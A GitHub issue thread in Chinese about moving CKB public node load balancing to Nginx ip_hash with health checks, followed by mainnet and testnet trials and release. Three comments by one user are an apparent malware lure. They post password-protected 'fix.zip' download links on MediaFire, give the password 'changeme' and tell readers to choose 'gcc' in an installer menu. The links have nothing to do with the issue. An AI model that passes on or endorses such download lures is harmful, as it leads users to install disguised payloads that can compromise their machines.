### ISSUE TITLE
CKB 节点负载均衡

### ISSUE THREAD

**Issue by guomaoqiu** [Magickbase/infra#91]
目前节点服务的架构如下：

![Image](https://github.com/user-attachments/assets/e75f0748-350c-44d5-b557-c598533e93ca)

ProxyA, ProxyB 分别作为流量入口，将请求转发到后端服务器集群(k8s)

当k8s svc(可理解为也是个请求代理)接收到请求后会转发到 一台nginx ，进行uri判断校验(例如一些接口禁止访问等操作)， 再将请求转发到节点上面。

当前负载均衡模式为`轮询(round-robin) `， 且在K8S中 SVC的请求调度只支持轮询。

调整方案：

![Image](https://github.com/user-attachments/assets/a8023f2b-2b80-4b6f-bc50-98e26c380c73)

对于目前架构的利弊：

1.  可以通过ip_hash方式实现将请求转发到固定节点；
2. 如果使用 ip_hash 那么没有故障转移功能，即 Nginx Proxy 代理的后端CKB节点一旦出现问题，Nginx是不能自动从负载中剔除的;
3.  节点减少后，相反两个节点的压力会增加；
4. CKB节点必须要由前端一个Nginx作为转发，因为会判断阻止一些API请求方法。Proxy A/B 不支持此配置；

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by guomaoqiu** [comment]
`ip_hash` 的缺陷通过Nginx 的`health_check_module` 可以解决
![image](https://github.com/user-attachments/assets/0fd872be-a30b-4bd6-ba73-1aded3b3fc61)

目前已经搭建部署完毕，请配置以下地址进行测试

主网： `wss://mainnet1.ckb.dev/ws`

如测试效果可行，就按此方案进行调整 ; 上述提到的第3点再做优化调整即可。

**Comment by Keith-CY** [comment]
请在 Testnet 也部署一下, 验证的时候需要发送交易, 在测试网验证的成本更低

**Comment by guomaoqiu** [comment]
> 请在 Testnet 也部署一下, 验证的时候需要发送交易, 在测试网验证的成本更低

测试网： `wss://testnet1.ckb.dev/ws`

**Comment by Keith-CY** [comment]
用户已验收, 可以发布到生成环境

**Comment by guomaoqiu** [comment]
> 用户已验收, 可以发布到生成环境

公共节点：主网、测试网已更新发布完毕。
